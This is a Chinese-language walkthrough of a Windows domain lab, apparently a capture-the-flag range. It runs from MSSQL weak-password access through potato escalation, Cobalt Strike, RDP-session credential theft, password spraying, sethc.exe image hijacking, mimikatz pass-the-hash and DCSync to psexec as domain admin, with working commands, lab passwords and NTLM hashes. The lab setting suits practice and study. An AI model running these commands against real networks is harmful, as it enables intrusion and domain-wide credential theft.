常规操作 fscan开扫

image-20231007211805267

只有一个win主机 并且这个win主机的话 是开启了mssql服务 并且使用了弱口令

MDUT登录

image-20231007211940258

这条权限开启了 尝试土豆家族提权

然后上线CS

image-20231007212152027

这里的话我是使用了spawn来派生到meterpreter

https://blog.csdn.net/weixin_39190897/article/details/118353886

其实meterpreter的getsystem自带这个土豆提权

在拿到第一个flag的时候 提示我们看看域内有没有别的用户

于是我们使用别的命令进行查看 (等会我们偷下别人的图 因为懒的重置靶机重新打了)

** image-20231007212726960

image-20231007212737126

image-20231007212755698

因为我们获得了这个system权限 于是我们直接注入这个用户的rdp进程

image-20231007212906974

上线后查看用户可以看到它存在共享文件

image-20231007212925680

然后直接访问这个共享文件夹的文件

1
shell type \\tsclient\c\credential.txt
1
2
3
4
5
6
7
beacon> shell type \\tsclient\c\credential.txt
[*] Tasked beacon to run: type \\tsclient\c\credential.txt
[+] host called home, sent: 63 bytes
[+] received output:
xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#

Do you know how to hijack Image?

读出来一个域账户和提示

于是先去尝试进行密码喷洒攻击 看看是谁的密码

(但是是在内网 于是我们先上传fscan扫一下)

1
2
3
4
5
6
7
8
9
10
11
12
172.22.8.18  就是外网主机的内网地址  WIN-WEB

172.22.8.15 DC01

172.22.8.31 WIN19-CLIENT

172.22.8.46 Win2016

netstat的时候看到 31正在RDP18


这次拿win主机来当跳板机

整理好信息后 我们上传代理

然后密码喷洒

1
2
proxychains4 -q crackmapexec smb 172.22.8.0/24 -u 'Aldrich' -p 'Ald@rLMWuy7Z!#'
proxychains4 crackmapexec rdp 172.22.8.0/24 -u Aldrich -p Ald@rLMWuy7Z!# -d xiaorang.lab

smb和RDP谁都可以

然后发现31 46都可以

于是进行登录 这里rdp登录会话的会提示密码过期

于是我们对这两账号密码进行修改

1
python3 smbpasswd.py xiaorang.lab/Aldrich:'Ald@rLMWuy7Z!#'@172.22.8.15 -newpass 'Whoami@666'

但是这里话只能登录 46这台机器 31这台机器的话不可以 会提示我们不在远程登录这个组里面

登录46这台机器后呢 我们根据前面的提示

1
Do you know how to hijack Image?

就是镜像提权

1
2
3
get-acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl *

//这个是查看权限

image-20231007222419719

这个用户就是经过身份验证的用户获取到的权限

(SetValue CreateSubKey ReadKey)的话 就是具有读写权限

https://www.freebuf.com/articles/es/214551.html 镜像劫持的文章

这里我们发现所有正常登录的用户都可以修改注册表,利用这个性质,修改注册表映像劫持

1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe"

简单的说就是打开注册表的同时 管理员cmd命令行也会弹出来

然后我们点击左下角的头像 点锁定

image-20231007213906983

然后连续点击shift 就会弹出来了

image-20231007213944604

然后就可以读取flag了

然后开始sharpblood查看域

image-20231007214100613

发现了我们rdp的这个机器有域控的权限

因为我们也获取了该机器的管理员权限

使用sekurlsa::logonpasswords抓取本机hash值

于是我们使用mimikatz导出该机器的hash值进行hash传递

然后执行dscync来导出域内所有hash值

1
2
3
4
5
6
1. sekurlsa::logonpasswords
2. mimikatz.exe "privilege::debug" "sekurlsa::pth /user:WIN2016$ /domain:xiaorang.lab /ntlm:4ba974f170ab0fe1a8a1eb0ed8f6fe1a" "exit"
3. mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit"

这样的话我们就能拿到域管的hash值了

最后拿着域管的hash值进行pth攻击就行了

1
proxychains4 python psexec.py -hashes :2c9d81bdcf3ec8b1def10328a7cc2f08 xiaorang.lab/administrator@172.22.8.46